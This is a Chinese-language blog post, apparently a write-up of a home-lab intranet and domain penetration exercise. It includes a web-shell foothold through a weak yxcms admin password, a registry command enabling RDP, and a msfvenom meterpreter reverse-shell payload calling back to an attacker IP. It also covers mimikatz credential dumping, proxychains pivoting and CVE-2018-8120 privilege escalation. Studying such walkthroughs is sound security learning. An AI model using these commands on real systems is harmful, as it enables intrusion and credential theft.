內網滲透 | 記錄一次簡單的域滲透

• 2020 年 2 月 19 日
• 筆記

環境搭建

三台虛擬機，拓撲如下：

看一下網路配置。

VM1雙網卡，第一個橋接一個VMnet2，橋接的作用是模擬將其web服務暴露在外網。攻擊機是在橋接網卡的網路中。

VM2、VM3全部是VMnet2，測試後是可以的。

後面碰到一個問題，DMZ無法與域控通訊，相當於整個域與DMZ失去了聯繫，後面發現要將DMZ的DNS設置成域控AD的IP。

初探DMZ

可以看到有個yxcms。

後台

存在弱口令：admin 123456

可以看到一些系統的設置，站點物理路徑:C:/phpStudy/WWW

先瀏覽一下後台，看看有沒有能get shell的地方。

看到了執行sql語句，但是在嘗試寫shell的過程中發現一句話寫不進去。

任意文件寫入

http://192.168.8.157/yxcms/index.php?r=admin/set/tpadd&Mname=default

目標路徑：

http://192.168.8.157/yxcms/protected/apps/default/view/default/config_inc.php

get shell

進入內網

關於發現內網主機以及代理的問題，在「淺析內網滲透」一文中有解釋：

這裡不再贅述，只是演示相關操作。

ipconfig

雙網卡，可知內網ip段時192.168.52.x，進行域滲透最好連接3389。

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

用上述命令開啟3389埠。

3389 open

add user

注意估計是有密碼策略，複雜度夠了才能添加成功。

但是3389連接不上，估計是開了防火牆……

可以選擇msf的shell關閉防火牆，或者是使用ngrok隧道連接3389。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.116 lport=2333 -f exe > get.exe    meterpreter > run post/windows/manage/enable_rdp

connect 3389

域滲透常用的命令：

ipconfig /all    查詢本機IP段，所在域等  net config Workstation    當前電腦名，全名，用戶名，系統版本，工作站域，登陸域  net user    本機用戶列表  net localhroup administrators    本機管理員[通常含有域用戶]  net user /domain    查詢域用戶  net user 用戶名 /domain    獲取指定用戶的賬戶資訊  net user /domain b404 pass    修改域內用戶密碼，需要管理員許可權  net group /domain    查詢域裡面的工作組  net group 組名 /domain    查詢域中的某工作組  net group "domain admins" /domain    查詢域管理員列表  net group "domain controllers" /domain    查看域控制器(如果有多台)  net time /domain    判斷主域，主域伺服器都做時間伺服器

簡單收集資訊後得到：域:god.org 域控:138 域成員:141

可以使用msf的getsystem提權成功  抓hash:hashdump  內網滲透 | 手把手教你如何進行內網滲透

或者參考上篇內網滲透msf mimikatz抓取明文。

mimikatz

內網訪問還是兩個方法：socks代理以及msf添加路由。

內網漫遊

這裡還是選擇了socks代理。

proxychains msfconsole

445也開著，嘗試打一波17_010,2003總是藍屏遂放棄……

這樣已經拿到了另一台域成員的許可權了。

proxychains rdesktop 192.168.52.141

傳個shell：

rdesktop -f 192.168.52.141 -u Railgun -p MIE123@u123 -r disk:E=/root/Desktop/

運行即可。

通過getsystem提權成功。接下來域控。

通過上面mimikatz的使用我們已經知道了域用戶的帳號密碼：Administrator

登陸:GODAdministrator hongri@u123

提權+hash：

CVE-2018-8120

這樣等域控管理員登陸就可以得到域控的密碼了。

這樣登陸的全被記錄了下來。

寫在最後

進行域滲透的最終目標就是拿到域控導出hash或明文密碼。

拿到DMZ業務段機器後，開個socks並且反彈個meterpreter的shell回來

• proxychians來msf或nmap
• Windows proxifier來滲透內網web
• meterpreter添加路由

然後就是域成員及域控的滲透，本文沒有涉及$IPC入侵，不過應該也挺常用的。

涉及的比較重要的是如何開3389，如何關閉防火牆，如何得到域控的密碼以及17_010無法反彈shell時怎麼辦。

拿到域控後提權導密碼，結束。